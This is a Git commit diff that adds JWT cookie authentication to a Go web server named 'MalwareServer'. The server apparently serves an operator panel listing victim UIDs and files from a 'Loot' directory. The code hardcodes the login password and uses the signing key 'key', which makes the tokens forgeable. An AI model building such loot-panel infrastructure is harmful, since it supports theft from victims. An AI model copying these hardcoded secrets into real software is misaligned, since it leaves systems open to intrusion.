Auth
This commit is contained in:
parent
945695f148
commit
fbc0738bf6
5
go.mod
5
go.mod
@ -2,4 +2,7 @@ module MalwareServer
|
|||||||
|
|
||||||
go 1.22.2
|
go 1.22.2
|
||||||
|
|
||||||
require github.com/liamg/magic v0.0.1 // indirect
|
require (
|
||||||
|
github.com/dgrijalva/jwt-go v3.2.0+incompatible // indirect
|
||||||
|
github.com/liamg/magic v0.0.1 // indirect
|
||||||
|
)
|
||||||
|
2
go.sum
2
go.sum
@ -1,2 +1,4 @@
|
|||||||
|
github.com/dgrijalva/jwt-go v3.2.0+incompatible h1:7qlOGliEKZXTDg6OTjfoBKDXWrumCAMpl/TFQ4/5kLM=
|
||||||
|
github.com/dgrijalva/jwt-go v3.2.0+incompatible/go.mod h1:E3ru+11k8xSBh+hMPgOLZmtrrCbhqsmaPHjLKYnJCaQ=
|
||||||
github.com/liamg/magic v0.0.1 h1:Ru22ElY+sCh6RvRTWjQzKKCxsEco8hE0co8n1qe7TBM=
|
github.com/liamg/magic v0.0.1 h1:Ru22ElY+sCh6RvRTWjQzKKCxsEco8hE0co8n1qe7TBM=
|
||||||
github.com/liamg/magic v0.0.1/go.mod h1:yQkOmZZI52EA+SQ2xyHpVw8fNvTBruF873Y+Vt6S+fk=
|
github.com/liamg/magic v0.0.1/go.mod h1:yQkOmZZI52EA+SQ2xyHpVw8fNvTBruF873Y+Vt6S+fk=
|
||||||
|
@ -8,19 +8,27 @@ import (
|
|||||||
"net/http"
|
"net/http"
|
||||||
"path/filepath"
|
"path/filepath"
|
||||||
"strings"
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"github.com/dgrijalva/jwt-go"
|
||||||
)
|
)
|
||||||
|
|
||||||
var (
|
var (
|
||||||
password = "hardcodedpassword"
|
password = "hardcodedpassword"
|
||||||
lootPath = "Loot"
|
lootPath = "Loot"
|
||||||
sessionCookieName = "auth_session"
|
sessionCookieName = "auth_session"
|
||||||
)
|
secretKey = []byte("key"))
|
||||||
|
|
||||||
type PageData struct {
|
type PageData struct {
|
||||||
UIDs []string
|
UIDs []string
|
||||||
Files []string
|
Files []string
|
||||||
}
|
}
|
||||||
|
|
||||||
|
type Claims struct {
|
||||||
|
Username string `json:"username"`
|
||||||
|
jwt.StandardClaims
|
||||||
|
}
|
||||||
|
|
||||||
func main() {
|
func main() {
|
||||||
http.HandleFunc("/", logMiddleware(loginHandler))
|
http.HandleFunc("/", logMiddleware(loginHandler))
|
||||||
http.HandleFunc("/loot", logMiddleware(lootHandler))
|
http.HandleFunc("/loot", logMiddleware(lootHandler))
|
||||||
@ -45,12 +53,28 @@ func loginHandler(w http.ResponseWriter, r *http.Request) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
if r.FormValue("password") == password {
|
if r.FormValue("password") == password {
|
||||||
|
expirationTime := time.Now().Add(1 * time.Hour)
|
||||||
|
claims := &Claims{
|
||||||
|
Username: "root",
|
||||||
|
StandardClaims: jwt.StandardClaims{
|
||||||
|
ExpiresAt: expirationTime.Unix(),
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
token := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)
|
||||||
|
tokenString, err := token.SignedString(secretKey)
|
||||||
|
if err != nil {
|
||||||
|
http.Error(w, err.Error(), http.StatusInternalServerError)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
http.SetCookie(w, &http.Cookie{
|
http.SetCookie(w, &http.Cookie{
|
||||||
Name: sessionCookieName,
|
Name: sessionCookieName,
|
||||||
Value: "authenticated",
|
Value: tokenString,
|
||||||
|
Expires: expirationTime,
|
||||||
Path: "/",
|
Path: "/",
|
||||||
MaxAge: 3600,
|
|
||||||
})
|
})
|
||||||
|
|
||||||
http.Redirect(w, r, "/loot", http.StatusSeeOther)
|
http.Redirect(w, r, "/loot", http.StatusSeeOther)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
@ -100,9 +124,19 @@ func renderTemplate(w http.ResponseWriter, tmpl string, data interface{}) {
|
|||||||
|
|
||||||
func isAuthenticated(r *http.Request) bool {
|
func isAuthenticated(r *http.Request) bool {
|
||||||
sessionCookie, err := r.Cookie(sessionCookieName)
|
sessionCookie, err := r.Cookie(sessionCookieName)
|
||||||
if err != nil || sessionCookie.Value != "authenticated" {
|
if err != nil {
|
||||||
return false
|
return false
|
||||||
}
|
}
|
||||||
|
|
||||||
|
tokenString := sessionCookie.Value
|
||||||
|
token, err := jwt.ParseWithClaims(tokenString, &Claims{}, func(token *jwt.Token) (interface{}, error) {
|
||||||
|
return secretKey, nil
|
||||||
|
})
|
||||||
|
|
||||||
|
if err != nil || !token.Valid {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
|
||||||
return true
|
return true
|
||||||
}
|
}
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user